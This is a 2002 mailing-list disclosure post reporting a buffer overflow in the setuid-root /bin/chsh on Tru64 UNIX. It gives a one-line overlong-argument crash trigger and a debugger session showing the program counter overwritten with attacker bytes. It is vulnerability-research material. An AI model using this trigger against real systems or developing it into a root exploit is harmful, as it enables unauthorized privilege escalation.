Vulnerability Development mailing list archives

TRU64 /bin/chsh overflow


From: Kevin Finisterre <dotslash () snosoft com>
Date: Tue, 21 May 2002 16:04:11 -0700

oops forgot one ... more soon. =]

% /bin/chsh `perl -e 'print "A" x 9000'`
Segmentation fault
% uname -a
OSF1 alpha.snosoft.com V5.1 732 alpha
% ls -al /bin/chsh
-rws--x--x   3 root     bin        32944 Aug 24  2000 /bin/chsh

# dbx ./chsh core
dbx version 5.1
Type 'help' for help.
Core file created by program "chsh"

warning: ./chsh has no symbol table -- very little is supported without it


signal Segmentation fault at
warning: PC value 0x4141414141414140 not valid, trying RA
> [__sia_warning, 0x3ff80196d20]        ldah    gp, 16368(ra)

-KF


Current thread: